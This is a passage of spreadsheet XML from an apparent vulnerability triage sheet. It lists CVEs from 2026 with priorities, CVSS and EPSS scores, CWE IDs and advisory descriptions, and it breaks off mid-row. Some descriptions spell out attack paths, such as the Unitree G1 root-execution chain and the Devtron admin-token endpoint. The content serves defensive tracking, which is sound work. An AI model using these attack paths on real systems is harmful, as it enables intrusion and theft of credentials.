          <t>Rently Smart Home versions 20.1.0 and prior are vulnerable to an Insufficiently Protected Credentials vulnerability. This could allow an attacker to retrieve pins including the Master Pin, overriding standard user permissions.</t>
        </is>
      </c>
      <c r="S442" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75960</t>
        </is>
      </c>
    </row>
    <row r="443">
      <c r="A443" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B443" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C443" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76224</t>
        </is>
      </c>
      <c r="D443" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E443" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F443" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G443" s="5" t="inlineStr"/>
      <c r="H443" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I443" s="5" t="inlineStr"/>
      <c r="J443" s="5" t="inlineStr"/>
      <c r="K443" s="5" t="inlineStr"/>
      <c r="L443" s="5" t="inlineStr"/>
      <c r="M443" s="5" t="inlineStr"/>
      <c r="N443" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O443" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="P443" s="5" t="inlineStr"/>
      <c r="Q443" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R443" s="5" t="inlineStr">
        <is>
          <t>ArcadeDB before 26.8.1 (arcadedb-gremlin, affected &lt;= 26.7.3) contains a remote code execution vulnerability in its Gremlin query engine. Although the engine defaults to the documented-secure java (gremlin-lang) engine, ArcadeGremlin.executeStatement() silently falls back to the insecure Groovy engine whenever a request carries any query parameter and the query does not parse as gremlin-lang. An authenticated user with any database role, including a read-only reader, can submit a parameterized Gremlin query to trigger the Groovy fallback and execute arbitrary operating system commands as the ArcadeDB server process user.</t>
        </is>
      </c>
      <c r="S443" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76224</t>
        </is>
      </c>
    </row>
    <row r="444">
      <c r="A444" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B444" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C444" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76639</t>
        </is>
      </c>
      <c r="D444" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E444" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F444" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G444" s="5" t="inlineStr"/>
      <c r="H444" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I444" s="5" t="inlineStr"/>
      <c r="J444" s="5" t="inlineStr"/>
      <c r="K444" s="5" t="inlineStr"/>
      <c r="L444" s="5" t="inlineStr"/>
      <c r="M444" s="5" t="inlineStr"/>
      <c r="N444" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O444" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="P444" s="5" t="inlineStr"/>
      <c r="Q444" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-306</t>
        </is>
      </c>
      <c r="R444" s="5" t="inlineStr">
        <is>
          <t>Unitree G1 EDU firmware through 1.5.2 contains an unauthenticated remote code execution vulnerability that allows network-adjacent attackers to execute arbitrary commands as root by chaining three weaknesses: an unauthenticated WebRTC-to-DDS bridge on TCP port 9991, a static AES-128 key stored with world-readable permissions, and a path traversal flaw in the chat_go knowledge upload API. Attackers can publish DDS control messages to restart the bashrunner service, plant a malicious payload in its script execution directory via path traversal, and trigger execution of that payload as uid 0 through the bashrunner shell subprocess.</t>
        </is>
      </c>
      <c r="S444" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76639</t>
        </is>
      </c>
    </row>
    <row r="445">
      <c r="A445" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B445" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C445" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77111</t>
        </is>
      </c>
      <c r="D445" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E445" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F445" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G445" s="5" t="inlineStr"/>
      <c r="H445" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I445" s="5" t="inlineStr"/>
      <c r="J445" s="5" t="inlineStr"/>
      <c r="K445" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t>
        </is>
      </c>
      <c r="L445" s="5" t="inlineStr"/>
      <c r="M445" s="5" t="inlineStr"/>
      <c r="N445" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O445" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P445" s="5" t="inlineStr"/>
      <c r="Q445" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R445" s="5" t="inlineStr">
        <is>
          <t>Adobe Commerce is affected by an Incorrect Authorization vulnerability that could result in a Security feature bypass. An attacker with high privileges could leverage this vulnerability to bypass security measures and gain unauthorized write access, causing a limited disruption to availability. Exploitation of this issue does not require user interaction. Scope is changed.</t>
        </is>
      </c>
      <c r="S445" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77111</t>
        </is>
      </c>
    </row>
    <row r="446">
      <c r="A446" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B446" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C446" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77393</t>
        </is>
      </c>
      <c r="D446" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E446" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F446" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G446" s="5" t="inlineStr"/>
      <c r="H446" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I446" s="5" t="inlineStr"/>
      <c r="J446" s="5" t="inlineStr"/>
      <c r="K446" s="5" t="inlineStr"/>
      <c r="L446" s="5" t="inlineStr"/>
      <c r="M446" s="5" t="inlineStr"/>
      <c r="N446" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O446" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P446" s="5" t="inlineStr"/>
      <c r="Q446" s="5" t="inlineStr">
        <is>
          <t>CWE-276</t>
        </is>
      </c>
      <c r="R446" s="5" t="inlineStr">
        <is>
          <t>In Ignition 8.1.53 and earlier, the Gateway "Create Project Role(s)" setting shipped blank, which permitted any authenticated user to create projects (if they can execute gateway scripts). Ignition 8.1.54 restricts project creation to Designer sessions and no longer relies on this setting. The 8.3 series is not affected.</t>
        </is>
      </c>
      <c r="S446" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77393</t>
        </is>
      </c>
    </row>
    <row r="447">
      <c r="A447" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B447" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C447" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78677</t>
        </is>
      </c>
      <c r="D447" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E447" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F447" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G447" s="5" t="inlineStr"/>
      <c r="H447" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I447" s="5" t="inlineStr"/>
      <c r="J447" s="5" t="inlineStr"/>
      <c r="K447" s="5" t="inlineStr"/>
      <c r="L447" s="5" t="inlineStr">
        <is>
          <t>pip:GitPython</t>
        </is>
      </c>
      <c r="M447" s="5" t="inlineStr">
        <is>
          <t>3.1.59</t>
        </is>
      </c>
      <c r="N447" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O447" s="5" t="inlineStr"/>
      <c r="P447" s="5" t="inlineStr"/>
      <c r="Q447" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-73</t>
        </is>
      </c>
      <c r="R447" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S447" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78677</t>
        </is>
      </c>
    </row>
    <row r="448">
      <c r="A448" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B448" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C448" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78681</t>
        </is>
      </c>
      <c r="D448" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E448" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F448" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G448" s="5" t="inlineStr"/>
      <c r="H448" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I448" s="5" t="inlineStr"/>
      <c r="J448" s="5" t="inlineStr"/>
      <c r="K448" s="5" t="inlineStr"/>
      <c r="L448" s="5" t="inlineStr">
        <is>
          <t>pip:nltk</t>
        </is>
      </c>
      <c r="M448" s="5" t="inlineStr">
        <is>
          <t>3.10.3</t>
        </is>
      </c>
      <c r="N448" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O448" s="5" t="inlineStr"/>
      <c r="P448" s="5" t="inlineStr"/>
      <c r="Q448" s="5" t="inlineStr">
        <is>
          <t>CWE-776</t>
        </is>
      </c>
      <c r="R448" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S448" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78681</t>
        </is>
      </c>
    </row>
    <row r="449">
      <c r="A449" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B449" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C449" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78682</t>
        </is>
      </c>
      <c r="D449" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E449" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F449" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G449" s="5" t="inlineStr"/>
      <c r="H449" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I449" s="5" t="inlineStr"/>
      <c r="J449" s="5" t="inlineStr"/>
      <c r="K449" s="5" t="inlineStr"/>
      <c r="L449" s="5" t="inlineStr">
        <is>
          <t>pip:nltk</t>
        </is>
      </c>
      <c r="M449" s="5" t="inlineStr">
        <is>
          <t>3.10.3</t>
        </is>
      </c>
      <c r="N449" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O449" s="5" t="inlineStr"/>
      <c r="P449" s="5" t="inlineStr"/>
      <c r="Q449" s="5" t="inlineStr">
        <is>
          <t>CWE-441, CWE-918</t>
        </is>
      </c>
      <c r="R449" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S449" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78682</t>
        </is>
      </c>
    </row>
    <row r="450">
      <c r="A450" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B450" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C450" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79707</t>
        </is>
      </c>
      <c r="D450" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E450" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F450" s="5" t="inlineStr">
        <is>
          <t>f45cbf4e-4146-4068-b7e1-655ffc2c548c</t>
        </is>
      </c>
      <c r="G450" s="5" t="inlineStr"/>
      <c r="H450" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I450" s="5" t="inlineStr"/>
      <c r="J450" s="5" t="inlineStr"/>
      <c r="K450" s="5" t="inlineStr"/>
      <c r="L450" s="5" t="inlineStr"/>
      <c r="M450" s="5" t="inlineStr"/>
      <c r="N450" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O450" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P450" s="5" t="inlineStr"/>
      <c r="Q450" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R450" s="5" t="inlineStr">
        <is>
          <t>A Path Traversal vulnerability in the builder endpoint in Google Cloud Agent Development Kit (ADK) versions 1.9.0 through 1.21.0 on Python allows an unauthenticated remote attacker to read arbitrary files using a crafted file_path query parameter.</t>
        </is>
      </c>
      <c r="S450" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79707</t>
        </is>
      </c>
    </row>
    <row r="451">
      <c r="A451" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B451" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C451" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80205</t>
        </is>
      </c>
      <c r="D451" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E451" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F451" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G451" s="5" t="inlineStr"/>
      <c r="H451" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I451" s="5" t="inlineStr"/>
      <c r="J451" s="5" t="inlineStr"/>
      <c r="K451" s="5" t="inlineStr"/>
      <c r="L451" s="5" t="inlineStr">
        <is>
          <t>pip:nltk</t>
        </is>
      </c>
      <c r="M451" s="5" t="inlineStr">
        <is>
          <t>3.10.0</t>
        </is>
      </c>
      <c r="N451" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O451" s="5" t="inlineStr"/>
      <c r="P451" s="5" t="inlineStr"/>
      <c r="Q451" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="R451" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S451" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80205</t>
        </is>
      </c>
    </row>
    <row r="452">
      <c r="A452" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B452" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C452" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80219</t>
        </is>
      </c>
      <c r="D452" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E452" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F452" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G452" s="5" t="inlineStr"/>
      <c r="H452" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I452" s="5" t="inlineStr"/>
      <c r="J452" s="5" t="inlineStr"/>
      <c r="K452" s="5" t="inlineStr"/>
      <c r="L452" s="5" t="inlineStr"/>
      <c r="M452" s="5" t="inlineStr"/>
      <c r="N452" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O452" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P452" s="5" t="inlineStr"/>
      <c r="Q452" s="5" t="inlineStr">
        <is>
          <t>CWE-1390</t>
        </is>
      </c>
      <c r="R452" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in hawtio-operator. When deploying Hawtio in cluster mode, the operator creates a cluster-scoped OAuthClient with automatic grant approval (GrantMethod: auto) and no client secret (public client). The redirect URIs are derived from the operator-created Route, whose hostname is tenant-controlled via the Hawtio CR spec.routeHostName field. A malicious tenant can register an arbitrary hostname as a valid OAuth redirect target and, because grants are auto-approved, obtain OpenShift access tokens of any cluster user who visits the crafted authorization URL without any consent prompt.</t>
        </is>
      </c>
      <c r="S452" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80219</t>
        </is>
      </c>
    </row>
    <row r="453">
      <c r="A453" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B453" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C453" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82064</t>
        </is>
      </c>
      <c r="D453" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E453" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F453" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G453" s="5" t="inlineStr"/>
      <c r="H453" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I453" s="5" t="inlineStr"/>
      <c r="J453" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K453" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L453" s="5" t="inlineStr"/>
      <c r="M453" s="5" t="inlineStr"/>
      <c r="N453" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O453" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P453" s="5" t="inlineStr"/>
      <c r="Q453" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="R453"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S453" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82064</t>
        </is>
      </c>
    </row>
    <row r="454">
      <c r="A454" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B454" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C454" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82075</t>
        </is>
      </c>
      <c r="D454" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E454" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F454" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G454" s="5" t="inlineStr"/>
      <c r="H454" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I454" s="5" t="inlineStr"/>
      <c r="J454" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K454" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L454" s="5" t="inlineStr"/>
      <c r="M454" s="5" t="inlineStr"/>
      <c r="N454" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O454" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P454" s="5" t="inlineStr"/>
      <c r="Q454" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R454"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S454" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82075</t>
        </is>
      </c>
    </row>
    <row r="455">
      <c r="A455" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B455" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C455" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82882</t>
        </is>
      </c>
      <c r="D455" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E455" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F455" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G455" s="5" t="inlineStr"/>
      <c r="H455" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I455" s="5" t="inlineStr"/>
      <c r="J455" s="5" t="inlineStr"/>
      <c r="K455" s="5" t="inlineStr"/>
      <c r="L455" s="5" t="inlineStr"/>
      <c r="M455" s="5" t="inlineStr"/>
      <c r="N455" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O455" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P455" s="5" t="inlineStr"/>
      <c r="Q455" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R455" s="5" t="inlineStr">
        <is>
          <t>Devtron through 2.2.0 fails to enforce authorization checks on the GET /orchestrator/api-token/webhook endpoint, allowing authenticated users to retrieve admin API tokens. Attackers with any authenticated account can query the endpoint with arbitrary project, environment, and application parameters to retrieve plaintext super-admin JWT tokens for full platform control.</t>
        </is>
      </c>
      <c r="S455" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82882</t>
        </is>
      </c>
    </row>
    <row r="456">
      <c r="A456" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B456" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C456" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83605</t>
        </is>
      </c>
      <c r="D456" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E456" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F456" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G456" s="5" t="inlineStr"/>
      <c r="H456" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I456" s="5" t="inlineStr"/>
      <c r="J456" s="5" t="inlineStr"/>
      <c r="K456" s="5" t="inlineStr"/>
      <c r="L456" s="5" t="inlineStr">
        <is>
          <t>npm:@xmldom/xmldom, npm:xmldom</t>
        </is>
      </c>
      <c r="M456" s="5" t="inlineStr">
        <is>
          <t>0.8.14, 0.9.11</t>
        </is>
      </c>
      <c r="N456" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O456" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P456" s="5" t="inlineStr"/>
      <c r="Q456" s="5" t="inlineStr">
        <is>
          <t>CWE-91</t>
        </is>
      </c>
      <c r="R456" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S456" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83605</t>
        </is>
      </c>
    </row>
    <row r="457">
      <c r="A457" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B457" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C457" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83606</t>
        </is>
      </c>
      <c r="D457" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E457" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F457" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G457" s="5" t="inlineStr"/>
      <c r="H457" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I457" s="5" t="inlineStr"/>
      <c r="J457" s="5" t="inlineStr"/>
      <c r="K457" s="5" t="inlineStr"/>
      <c r="L457" s="5" t="inlineStr">
        <is>
          <t>npm:@xmldom/xmldom</t>
        </is>
      </c>
      <c r="M457" s="5" t="inlineStr">
        <is>
          <t>0.9.11</t>
        </is>
      </c>
      <c r="N457" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O457" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P457" s="5" t="inlineStr"/>
      <c r="Q457" s="5" t="inlineStr">
        <is>
          <t>CWE-1333, CWE-400</t>
        </is>
      </c>
      <c r="R457" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S457" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83606</t>
        </is>
      </c>
    </row>
    <row r="458">
      <c r="A458" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B458" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C458" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83607</t>
        </is>
      </c>
      <c r="D458" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E458" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F458" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G458" s="5" t="inlineStr"/>
      <c r="H458" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I458" s="5" t="inlineStr"/>
      <c r="J458" s="5" t="inlineStr"/>
      <c r="K458" s="5" t="inlineStr"/>
      <c r="L458" s="5" t="inlineStr">
        <is>
          <t>npm:@xmldom/xmldom, npm:xmldom</t>
        </is>
      </c>
      <c r="M458" s="5" t="inlineStr">
        <is>
          <t>0.8.14, 0.9.11</t>
        </is>
      </c>
      <c r="N458" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O458" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P458" s="5" t="inlineStr"/>
      <c r="Q458" s="5" t="inlineStr">
        <is>
          <t>CWE-91</t>
        </is>
      </c>
      <c r="R458" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S458" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83607</t>
        </is>
      </c>
    </row>
    <row r="459">
      <c r="A459" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B459" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C459" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83608</t>
        </is>
      </c>
      <c r="D459" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E459" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F459" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G459" s="5" t="inlineStr"/>
      <c r="H459" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I459" s="5" t="inlineStr"/>
      <c r="J459" s="5" t="inlineStr"/>
      <c r="K459" s="5" t="inlineStr"/>
      <c r="L459" s="5" t="inlineStr">
        <is>
          <t>npm:@xmldom/xmldom, npm:xmldom</t>
        </is>
      </c>
      <c r="M459" s="5" t="inlineStr">
        <is>
          <t>0.8.15, 0.9.12</t>
        </is>
      </c>
      <c r="N459" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O459" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P459" s="5" t="inlineStr"/>
      <c r="Q459" s="5" t="inlineStr">
        <is>
          <t>CWE-91</t>
        </is>
      </c>
      <c r="R459" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S459" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83608</t>
        </is>
      </c>
    </row>
    <row r="460">
      <c r="A460" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B460" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C460" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83609</t>
        </is>
      </c>
      <c r="D460" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E460" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F460" s="5" t="inlineStr">
        <is>
